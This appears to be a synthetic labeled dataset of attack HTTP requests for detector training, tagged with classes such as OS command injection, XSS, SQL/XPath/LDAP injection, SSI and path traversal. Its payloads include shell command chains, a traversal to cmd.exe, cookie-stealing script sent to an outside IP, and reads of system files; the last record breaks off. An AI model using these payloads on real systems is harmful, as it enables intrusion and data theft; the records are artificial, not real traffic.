POST /sXYg3nao.TV/aO0A/iimah24ra/yT3wLIbR/sCy0NY-l1RaJfka/E9t8jedsef3cme9ilo/0D/J6ClQXCRy6/lSevalT5.Q-/ePSsRokcpSLl.png? HTTP/1.0
Content-Length: 170
Content-Language: hmxe,yhllla,herf
Content-Encoding: deflate
Content-Location: http://unSXexru.com/ltie/bors5eeo/ntptJR/nxxp/eocrio3r.php4
Content-MD5: eHJsZmVpbnVuYTFkM2dwZA==
Content-Type: application/x-www-form-urlencoded
Host: www.lLetn9o.cz:80
Connection: keep-alive
Accept: application/rtf, image/jpeg, application/zip
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-stale=5953
Cookie: WnBKelibOGLH=e48dtq;WlinoceLGbI6=ff2SMkD4;cemfx=6594809;i2v=huqaqs taap;nsomsSttdnwIai=ioXG31IV
Cookie2: $Version="466"
Date: Mon, 11 Jun 07 10:11:13 CET
ETag: W/"mdXR3j0NM3wblChswxg"
From: stutq@nSO8bteeO.be
If-Match: "_i3ggmKP9ikLm2z-m"
If-None-Match: *
If-Range: *
Max-Forwards: 125
Pragma: no-cache
Authorization: Digest realm
Range: -1
Referer: http://pEfmie.uk/psat/sp0ogtes/reshaztr.msf
TE: trailers,gzip;q=0.3,deflate
User-Agent: Mozilla/4.0 (X11; U; Solaris 6.1; Cb-ed; rv:2.6.7) Gecko/52216837
Via: titlu/4.9 www.ivtozo.htm
----: -------------

9foN6h9=HI&ou2omrie= ;   echo    ;  w       ; uname   -a    ;  id&uereeest=/borlndia5sc;&8c4apgo4t=e7rLSwnaj&syr4e6etodd=0slebeeftceDkyyw&9LFq=passwdfRafeaygu

End - Id: 43086
Start - Id: 36479
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 80.192.141.18
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress
Accept-Language: oohOrn-x;q=0.8, co-orst, iouEea-lhdots;q=0.1, lpsw4v-t;q=0.3, i-ra4;q=0.5
Cache-Control: min-fresh=723
Client-ip: 221.93.140.194
Cookie: se6eibF=rdqnpezziidIty;i2xsfem=an1creb9;9aijsg=58896;rdctaiwGetfsrH=tscriptoaognwhtpasseft
Cookie2: $Version="877"
Date: Tue, 27 Jul 04 15:44:34 CET
ETag: "b.tqILcRPgjyibN"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Fri, 02 Jan 09 04:51:22 CET
If-Unmodified-Since: Wed, 29 Jun 05 24:28:26 CET
If-Match: *
If-None-Match: "WV99r78SvCx-jsQKD"
If-Range: Fri, 25 Apr 08 10:27:49 GMT
Max-Forwards: 421
MIME-Version: 9.8
Pragma: r='1dAraae'
Proxy-Authorization: NTLM d09jRGlnc2VnaWJyZWthdDk0bWU3NzlpbW5qbk9zRXNoZGx0TWVuVWRhb3Fvbw==
Authorization: NTLM bHBzYWVzaGVBdXcycmhkQXNvbG9PYmVPSW0zZU1rRVJhZXo=
Range: 998505-,-0540,815-
Referer: /lqay.js
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/2.8 (compatible; MSIE 2.4; Mac OS X; rAEvst; dTeee8ih)
UA-CPU: Sparc
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: FTP/2.3 212.152.123.184:9654
Transfer-Encoding: deflate
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36479
Start - Id: 38622
class: LdapInjection
GET /gemt3opv7i/6AKK9c3FnyBIlXf0qbi/hJ5IjvuvLLg/Mall/nRxesonnonigg4tO4s/rvOMMf0i8Yrq7jLTis6/@tdHsvDP4FMf9g6/lpneai5qhyKn/eEtiiPlQoeraa/i7tvHV6M/etru3thtghiocelef0r7.dll?moiafOTitrho=Hg%24jot%29t1vsl&jsatoA=58&JsNEVoecho=%29+%28%7C+++%28displayName%3Dhad*%29%28name++++%3D++had*++%29%28+++mail%3Dhad*++++%29&ethn=gp3&naoh7t=ooddqWi26vt&iMncmtelnetQx=%3CtE%3Ai+ft%7C&71sas0ao=ht9+r&ytong=hJ04_xb1YMLi&tnecegbmeoijrd=%28lh%28&hbKcpositionLmochavLV6=lx3sCHnSA977&El=+le%3Bn9 HTTP/1.0
Host: www.hetvca.de:3
Connection: close
Accept: video/*;q=0.6, text/*, audio/x-wav
Accept-Charset: x-mac-chinesetrad;q=0.1, x-mac-greek;q=0.7, x-mac-greek;q=0.7, utf-8;q=0.8
Accept-Encoding: identity;q=0.8, compress, identity;q=0.0
Accept-Language: elas-slo;q=0.1
Cache-Control: no-transform
Client-ip: 191.229.251.67
Cookie: C6H0is=aLEiexectt/prLctmp;ve2mto=3a;tei3Y3mcms=t3etn0icpg;jc98odu=r0o-kt8nw8likeinnacE
Cookie2: $Version="788"
Date: Tue, 23 Dec 08 14:17:24 CET
ETag: W/"78VQV6Gzdd4iSe."
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Sat, 27 Mar 04 23:07:42 CET
If-Unmodified-Since: Tue, 02 Oct 07 15:54:54 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 0.3
Pragma: hre=a8tkfii
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: n79iy LycOoh=2diisb
Range: 66206-063
Referer: /hceca/khorI/opyi/u7eyba.dll
TE: trailers,trailers
Trailer: If-Range
User-Agent: iEadokioIm/6.9.5.5
UA-CPU: x86
UA-Disp: 6369,756,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: HTTP/5.1 www.txgenIay.js, 3.1 www.czus.js
Transfer-Encoding: iatow; 0af0t=uuohet
Upgrade: rpeyc/9.4, l7e/9.7, Ouhf/0.7, rzONo/2.0
Warning: 385 www.ietrrth1.htm "wefuh94ogoiYectles" 
X-Forwarded-For: 103.229.175.133
X-Serial-Number: 325446948
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38622
Start - Id: 47762
class: XSS
GET /tck5yaXS/eebtdonj/m5an/r2qZCK2@5P/mvrttk/dil/llGQAaB62/geEner5eae4eal.js?enrh8s=dEo4Edtbre8o&pusldDhftt=%25ox&rRmhne=0+doy&eo8tiyo3t=mautoexeco+%3BVetcifaa9nagl%5Ceex&pdULv=7751&Anas=euyftrSu40x&s6len6N5utw0d=ltNs&oekeieslf=%26%3Cscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F1.127.85.114%2Fdell.nsf%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E&euA1idoai=is&lhath60=0994317&zNpRi6bodyMBJ=d5https&BRjinKhaving=3IohchR&Pdeleteandshutdownxmaile@4=twWdIio HTTP/1.1
Host: www.i1ksawn.org:9
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 229.128.26.244
Cookie: tsyitttra=noeae;tdlhoi=nQXrd;htn9nz=+
Cookie2: $Version="9"
Date: Sat, 14 Aug 04 04:54:54 GMT
ETag: "V0Vh57R1gKYyWC."
Expect: d1Sn88md=cmr2icr;5hrwruT
From: ychumrg@eeAsehi.cz
If-Modified-Since: Tue, 05 Oct 04 20:59:43 CET
If-Unmodified-Since: Thu, 03 Mar 05 17:48:33 CET
If-Match: "oVLqCLsx.8aQMLBuEc"
If-None-Match: "099NsL8hZESCDj@XABE4"
If-Range: *
Max-Forwards: 0
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: Basic b255ZnIxbDpuNWVvbg==
Range: -41921,082-
Referer: http://www.tSla.it/eld0rmt.dll
TE: chunked,trailers
Trailer: Date
User-Agent: Mozilla/2.7 (compatible; MSIE 3.4; Mac OS X; honru; e9ewko)
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: 5.8 118.254.83.63, 5.8 www.ubhm.jpg
Transfer-Encoding: gzip
Upgrade: napl/9.6, u8eeko/2.8, unr/6.5, Cfe7/9.8
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 88.106.208.229
X-Serial-Number: 47690533150312984482
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47762
Start - Id: 49676
class: XPathInjection
GET /OnOltt/hEdedsamTsosala/iMi/noobeLHwNZtuo4s/9iqrsthrecoogf/teoeoatr/ufOQAfUeK/phox4gQ.AE2.h_h@1cO/ssren8e5dCpkrsfisth.asp?alB=65382&pEzotnmahe=no&eiSKleujui=787&ukwsnmjteey0=2533&nd8vxgh=9a&7eirab3fmioNc=365436&eez5=568&no2djteart=683+++++or++++i%2Flp%2Fllvrte%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D409%5D+++or++++44634%3D&ILTU=7&sitrasjeebarin=70135380&b2diwf4=03894886&mhanr5tlo=6097&rhFlya2chebm=wfjpe HTTP/1.0
Host: www.ednrcst.be
Connection: sthgptdy
Accept: */*;q=0.0
Accept-Charset: x-mac-chinesetrad;q=0.5
Accept-Encoding: deflate, identity;q=0.0, deflate, deflate;q=0.9, gzip
Accept-Language: n9ooordf-etIuis, ryvair-o9h;q=0.2, rntu-zawHign, cettel-w;q=0.9
Cache-Control: min-fresh=723
Client-ip: 102.196.28.62
Cookie: Kaccess_logXrGch=anvahodb7cnme;rr=24500319;efnaesHoc=9685;thag=u;
Cookie2: $Version="861"
Date: Tue, 08 May 07 22:58:12 GMT
ETag: W/"8vg1Wz8V9qRfAnK"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Thu, 17 Jan 08 06:37:38 CET
If-Unmodified-Since: Thu, 19 May 05 19:05:20 UTC
If-Match: *
If-None-Match: "wNUA6tqfUlx57743H"
If-Range: *
Max-Forwards: 85
MIME-Version: 5.9
Pragma: hd='aapisaa'
Proxy-Authorization: fefd 0ae8ehin=q6gL
Authorization: sdle meWstur=sniaulb
Range: -09
Referer: http://www.8erm.org/di8zoatt/kw5f/7nr7/s2he61tl.nsf
TE: chunked,chunked
Trailer: Range
User-Agent: o4tin9s/2.3
UA-CPU: Sparc
UA-Disp: 8272,159,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 491x233
Via: HTTP/5.0 118.178.44.198, yea/3.5 218.106.146.168:03
Transfer-Encoding: compress
Upgrade: uva/6.8
Warning: 381 115.122.86.133 "cnay5hst5e7r" 
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49676
Start - Id: 39647
class: SSI
GET /ihbiAewliqstsiea0jh/uoneu9Zv2QNk5hn8uA7s/nFrP@9.CqnmPSoxaTgZ/msp2eabauauk2yg0eli/eJKK/3Uf.gif?eim9npasx2otDs=%3C%21--%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&R1hr=33&ygrjcmbeeiet=rm4ot HTTP/1.1
Host: 37.33.115.95
Connection: uR2Eien
Accept: */*
Accept-Charset: gb2312, windows-1250;q=0.4, x-mac-cyrillic, x-mac-cyrillic;q=0.8, x-mac-ce
Accept-Encoding: gzip;q=0.6, identity;q=0.1, identity
Accept-Language: ti-ootmhgh;q=0.0, iu-Etarssge
Cache-Control: jrr=3rLoh
Client-ip: 39.207.20.202
Cookie: lgshtvo0=dzsu;stnp6ld=88865580;etete=ndrcpbino0;TaIhe=90265082
Cookie2: $Version="185"
Date: Sat, 17 Dec 05 02:03:27 GMT
ETag: "Pte5BHI2KbP1-ib2"
Expect: 100-continue
From: npzilkre@eesaoE.uk
If-Modified-Since: Tue, 25 Jan 05 12:56:22 GMT
If-Unmodified-Since: Fri, 20 May 05 08:22:40 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 54-,0-33,3-74
Referer: http://www.oIbStTs.cz/Ansrhe/9Esklh/nSle/oslTaRpn.pdf
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: e2hahah (kN-4IMIO; ed-8Bf@YxP; zUkqo@vq1; r3HyZd; bWc0-WYMV0)
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 587x0700
Via: 9.8 www.nxdsog.jpeg:792, 8.1 179.52.196.3, 6.8 21.9.135.254:153
Transfer-Encoding: compress
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39647
Start - Id: 45702
class: PathTransversal
GET /tenqp/9reLKKly1JX/neEatArT1naAieo/Ai2cySliiAgdztmmrdy/eIQ.aP-S90gRcoF/L081PpEL.sh?eeeRa5ee=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&dvtrkeyoehsEt=tmejEdaa&aNoTi3oa3hftga6=0108450 HTTP/1.1
Host: 186.105.65.173:65189
Connection: ngshe
Accept: audio/*, text/plain;q=0.3, video/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: ybeat6=shisd
Client-ip: 8.138.141.106
Cookie: tecmsxa= nengc'Sa;sseR=3-2xJE;TOHJ2fs3E=Aexec;servicesBOZ20p3qkZ1=6494752474;dlnbS=450584
Cookie2: $Version="46"
Date: Wed, 14 Jan 04 06:48:29 UTC
ETag: "2j2pLmGkE8-lE0K5GK"
Expect: elywicem=ialbul;etbnuwsp=a7asis9n
From: eajtut@smge.gov
If-Modified-Since: Sun, 13 Nov 05 11:19:08 UTC
If-Unmodified-Since: Mon, 21 Aug 06 24:09:44 GMT
If-Match: "-fiQB7xbz_BH9HJ46"
If-None-Match: "0ANdu2RYhpRJzkH"
If-Range: *
Max-Forwards: 308
MIME-Version: 5.2
Pragma: as='en7p'
Proxy-Authorization: Digest realm
Authorization: Basic ZXJzemU6NGVlZDBl
Range: -934,-807,-703421
Referer: http://www.lOxiua.biz/iezki/2onaa0.conf
TE: chunked;q=0.9,trailers
Trailer: Cache-Control
User-Agent: Mozilla/7.1 (Windows; U; Win98 2.8; ur-gw; rv:9.9.6) Gecko/14325132
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6938x271
Via: FTP/4.3 www.shentLt.jpg
Transfer-Encoding: 0zes
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45702
Start - Id: 46291
class: PathTransversal
GET /2_Eas4M-/sZ2.Stxgkmj./nwF6a_Em/Tqcata/er1awW.gdR7xs6r./jteSc30eahimM/bFrW1R.mdb?hwb7hhn4erolsdl=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&iL=AAtsuHoieehieVOo&oameortka38ei=csCpjx1GV&3st9up9=nanos&djlibjyYjdivU=o4Nvcm&aeRarEinfm2y=okOCG&choloaa=pVAZVGVNS9j%40&meroeet5nli=t8qYMpy2&Settc=76&ltaigqrswm=985233&thOavaAOt6des=29600&8tfdnuslsr=rt+n&fs=7 HTTP/1.1
Host: 238.254.212.93:83
Connection: close
Accept: application/*;q=0.7, image/jpeg
Accept-Charset: euc-jp;q=0.1, macintosh, windows-1254;q=0.6, x-mac-cyrillic;q=0.6
Accept-Encoding: gzip, compress;q=0.2, gzip;q=0.4
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 54.146.114.194
Cookie: dihlaTzcesia=admine)trsxtermvbscriptfl6nhttp;ilclaexhehfEtv=xterm=0varidgroup bygOyt8dropgH3(ha5;izn9meE=thnopsb8l+r
Cookie2: $Version="38"
Date: Sat, 29 Aug 09 06:12:10 CET
ETag: W/"Tr79t_UXhl_B.uI5Su"
Expect: 100-continue
From: rhcEtdlT@plt6rnlmRh.it
If-Modified-Since: Sat, 28 Mar 09 04:09:29 CET
If-Unmodified-Since: Wed, 18 May 05 07:08:36 UTC
If-Match: *
If-None-Match: "BWYnQVYZZntYhMidtpH"
If-Range: Fri, 29 Oct 04 11:02:37 CET
Max-Forwards: 298
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: Basic Ym8zRHhlTjp0VURo
Range: 5-,07-2
Referer: /nlD7s/da83zchn.zip
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.1 (X11; U; Open BSD i386 3.7; iT-n5; rv:7.6.2) Gecko/83543637
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 4.3 255.38.36.72:275, 6.0 www.Yotnu.htm
Transfer-Encoding: cvomH; obawN=ooomE
Upgrade: seEc/8.9, 7elors/6.3, 4uhv/9.8, I5eg5m/5.5
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 177.74.168.130
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46291
Start - Id: 46121
class: PathTransversal
POST /lhfqpwe5hw/e5GCqqaRQA.3QMH8JIe/det1wNu8eanhnfyp.dll? HTTP/1.0
Content-Length: 171
Content-Language: i,ielec7u,e
Content-Encoding: identity
Content-Location: http://c9t4n.fr/vlsHd/lhau/9wscT/Nziaoi.msf
Content-MD5: aGRoZGphdGF0aWRhaGlkNw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Feb 07 02:23:47 GMT
Last-Modified: Fri, 21 Mar 08 22:40:36 CET
Host: 13.96.39.181
Connection: keep-alive
Accept: text/html
Accept-Charset: x-mac-greek;q=0.4, x-mac-korean, iso-2022-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2391
Client-ip: 168.38.37.144
Cookie: z_1RRpAZqwQ=aouoe;oyayodacImrei=3921076;WpAaosc=OotGahentwrl<;x89teUteithnleN=82;sAtjuiu3iNGe=2229
Cookie2: $Version="429"
Date: Sun, 31 Aug 08 05:12:40 CET
ETag: W/"N6_VtHjK9oCwtm@"
Expect: 100-continue
From: heiqUte@jyli.cz
If-Modified-Since: Fri, 07 May 04 15:52:56 CET
If-Unmodified-Since: Wed, 18 Jun 08 08:40:35 UTC
If-Match: "_Mr7eIsEX@D_CLSG"
If-None-Match: *
If-Range: Tue, 16 Oct 07 11:56:28 UTC
Max-Forwards: 646
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5-sess
Range: -03018,-4474
Referer: http://dostb.com/ushmho.tar.gz
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/9.8 (X11; U; Solaris 9.3; am-om; rv:3.5.0) Gecko/13262203
UA-CPU: StrongARM
UA-Disp: 282,781,32
UA-Color: color16
UA-Pixels: 744x629
Via: 4.6 246.22.84.28
Transfer-Encoding: rb3ui7; otde=l4ur8n
Upgrade: cRpj/3.7
Warning: 433 88.153.253.218:7556 "oaenugabowmv" "Sun, 04 Nov 07 02:57:20 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 1895147282495083455
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cy=t]mm &mSIoV0dP=pl00dq6i&htzbodihavd=52700610&t1s4Sdo=ntH&oqoTt3tvadsoa=../../../../../../proc/version&eIerb=ehtY3&itde=76759253&9hHZiyemi2uni=oqutCAo6vH

End - Id: 46121
Start - Id: 41499
class: SqlInjection
PUT /paoi2nanrnuies/4XTNzNlwtwB/l./sswaeihescwbn/o37/SH57xjMk/nV3xnwZfab3BJj/or355Newotntahestts/9VYM/5935Dz9.mspx? HTTP/1.1
Content-Length: 138
Content-Language: 83acAo,pgwId,obZood
Content-Encoding: identity
Content-Location: /iAaufhts/wrhel.exe
Content-MD5: bUloTnNvMmVMZHJlcnJ3eA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Jul 09 07:26:25 UTC
Last-Modified: Fri, 18 Sep 09 22:14:03 UTC
Host: www.osfSyinu.biz
Connection: hrlsA
Accept: application/rtf, video/*, video/*;q=0.7
Accept-Charset: x-mac-hebrew, iso-8859-8-i;q=0.9, iso-8859-1
Accept-Encoding: *
Accept-Language: mai-g0, 7em-r, etudEGn-2;q=0.7, bVh-eilsee;q=0.3, nlrs-delnt9;q=0.4
Cache-Control: no-store
Client-ip: 221.158.6.21
Cookie: smabmitsCni=oIo0fZkmVQL;ZKkROO1openpR=4fs7nyieA;EuNipdGhCybei=dsno1deleteo;meearUthydiiH=uh3e8aDneoei7r;eeiaAwngcarnnfh=ld7S;drtouuzelHae=aemirrlet
Cookie2: $Version="965"
Date: Mon, 02 Jul 07 23:40:11 CET
ETag: W/"0ZshxsBySvEFpMSKy"
Expect: maEbbf
From: 8raL@hudstis9.fr
If-Modified-Since: Fri, 01 Sep 06 24:59:04 GMT
If-Unmodified-Since: Mon, 02 Feb 04 11:56:52 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 03 Jun 07 22:42:21 GMT
Max-Forwards: 271
MIME-Version: 5.5
Pragma: xjtueY='Noa3a2d'
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: Basic eHJlZWVJOnNuc2Ry
Range: 78-403185
Referer: /b1em.jpeg
TE: deflate;q=0.9,trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/7.6 (X11; U; Solaris 1.5; ua-en; rv:8.6.4) Gecko/54139752
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: HTTP/0.8 www.welddp.shtml, 4.2 169.122.156.182
Transfer-Encoding: compress
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

titt1=e&nO4=oVa78UC&hw=en&OK6zh=o0bs&nsta=w r7w&ewnr1sNhsti=031043&nyimohtnioksAt=OrigText'OR'edfglac'  =    'el'&S74s@5YBX=e8

End - Id: 41499
Start - Id: 45473
class: PathTransversal
GET /5I.1Df14.DzGghtIH/J@bZ1NPEM2Yftpg/eNOcR0h6U/q_sYV3r-YA/nDzVwm@mtquoiXlYJeWo/awDdot/cac8v3VcoxOy5WQ/feme3Uaok1ftm8tn/TRhnc/crosltoH/nIbmdYMLW.php3?obamex7cathzsTt=762597&YYkPnJ-GYC=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&ls0aTGphph8J=gti0stdinwygu%40 HTTP/1.0
Host: www.miWeEaWCvi.ch
Connection: hcamdq
Accept: image/jpeg, image/gif, audio/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: rlz-Nu5n;q=0.5, huula-fne5;q=0.1, 3iWmls-z1jpdU;q=0.5, gxsneosA-cdae, p-aTp
Cache-Control: no-cache
Client-ip: 172.157.36.227
Cookie: ue=dTt8wk
Cookie2: $Version="01"
Date: Tue, 16 Jun 09 24:41:41 UTC
ETag: "gbDOmC@O10HWIKffXP"
Expect: 100-continue
From: 9lho@aiRe.net
If-Modified-Since: Thu, 22 Mar 07 12:30:34 UTC
If-Unmodified-Since: Sat, 18 Oct 08 06:54:53 GMT
If-Match: "iRl7o39FxcmhJ_Nx9"
If-None-Match: "cNBHtsEym-L7@39G"
If-Range: Wed, 03 Aug 05 07:48:56 UTC
Max-Forwards: 9
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ohi4
Authorization: Digest cnonce="dlear"
Range: 934-,6-,-7
Referer: http://www.3egnwena.gov/eaobrvs/adew/mbnu/o9ted/ewkUcz4.css
TE: trailers,gzip;q=0.2
Trailer: Referer
User-Agent: rqnaordgmtuT
UA-CPU: x86
UA-Disp: 1452,073,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5163x468
Via: FTP/7.5 11.170.76.113, FTP/5.1 www.gluesb.html:83591, tteX/2.1 www.ednikhy.tiff:3
Transfer-Encoding: compress
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45473
Start - Id: 35543
class: XPathInjection
PUT /eka/r6e1sbQvQw-xRTFMAHF/Pfbe/tqtBCnZoA.aspx? HTTP/1.1
Content-Length: 272
Content-Language: 7gctEwe3,nme8opdM,sjem
Content-Encoding: gzip
Content-Location: /e9ADj/iracb9r/esinapO/aa3ui/zELgu.gz
Content-MD5: aTh1ekFvbmUzZDZTdE5zcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Feb 04 22:46:00 GMT
Last-Modified: Fri, 03 Sep 04 05:47:47 CET
Host: 146.142.69.238
Connection: keep-alive
Accept: application/*;q=0.6
Accept-Charset: koi8;q=0.2, macintosh;q=0.8
Accept-Encoding: *
Accept-Language: donnhMsg-ae0;q=0.9
Cache-Control: only-if-cached
Client-ip: 50.148.205.107
Cookie: 6a0h6eaUtnraei=1168427;lsock_streamYncxvarN=r2
Cookie2: $Version="705"
Date: Mon, 18 Jan 10 16:10:04 UTC
ETag: W/"YthNYXXNEQKeFuBoXKu9"
Expect: cpeo=neIawpa;jnellsV
From: Q6fua@alfpse.net
If-Modified-Since: Mon, 15 Jan 07 05:19:48 GMT
If-Unmodified-Since: Sat, 26 Nov 05 05:11:08 UTC
If-Match: "w5zN0vj4csCx6..4"
If-None-Match: "ey4TpTgzmWzSm9l_w"
If-Range: *
Max-Forwards: 2
MIME-Version: 7.5
Pragma: naR8g9ee=tnyok
Proxy-Authorization: NTLM aHJtZTJlYWVzZXIwb2VybGVlb21yOGFuZU5pcnBpam50aQ==
Authorization: Digest uri=http://www.Jnso2nje.ch/be7spcze/soWxe/wit3/pnebl0t.pdf
Range: 7-26018,971548-,-1
Referer: http://www.n15t.de/rcja8/niuefe9n/nleyNhhi/3hAn.avi
TE: chunked
Trailer: Host
User-Agent: taLs1t/9.5
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-Pixels: 502x021
Via: HTTP/5.1 www.trhrj6.gif, HTTP/1.8 180.78.202.80, 0.1 www.tpzw.shtml:251
Transfer-Encoding: deflate
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 73.71.14.52
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

swleihtohS=idTdDOwHt&ayeYtrEa=eeia~fJys&iurs=oaadl'     or  (i     < count(hsed/child::text()) and  j  <     count(ht/child::comment()) and     k   <   count(Kdr6s/child::*) )  or   'kOtneo'  =    '  siNie'  or

End - Id: 35543
Start - Id: 47009
class: XSS
GET /dyDhPQJIp.php?ntamnna5tl=rV-IDgu&2E0qtnrea=%3Cobject+classid+%3D+%22clsid%3A...%22+++++codebase+%3D+%22+++javascript%3A++%5Balert++%28%27gxatrino%27%29%3B%5D++%22++++%3E&wdeiih=0&dyS5rifghdhm=5355323 HTTP/1.1
Host: 153.134.232.1
Connection: close
Accept: audio/*;q=0.8, audio/*, application/*
Accept-Charset: iso-8859-8-i;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: ebem-and, cehd-dtat4, saOyNkoU-Et, xlehi-cot;q=0.3
Cache-Control: max-age=3517
Client-ip: 18.81.58.217
Cookie: psOi=khtsf3dcoeteSeocs;trErsLnMc8rdmaa=ctEsomlochp;i3c2hues=dFeg0wb4ClTj;G.e2M6IoptXU=8n
Cookie2: $Version="07"
Date: Wed, 17 Mar 04 01:56:10 UTC
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: vsl8rn@orhoE.de
If-Modified-Since: Sat, 08 Aug 09 10:50:52 GMT
If-Unmodified-Since: Mon, 25 Apr 05 06:06:36 CET
If-Match: *
If-None-Match: *
If-Range: "610W8G7WRQcXWAW"
Max-Forwards: 97
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Basic bGNzZzphYXNy
Range: 5-22964
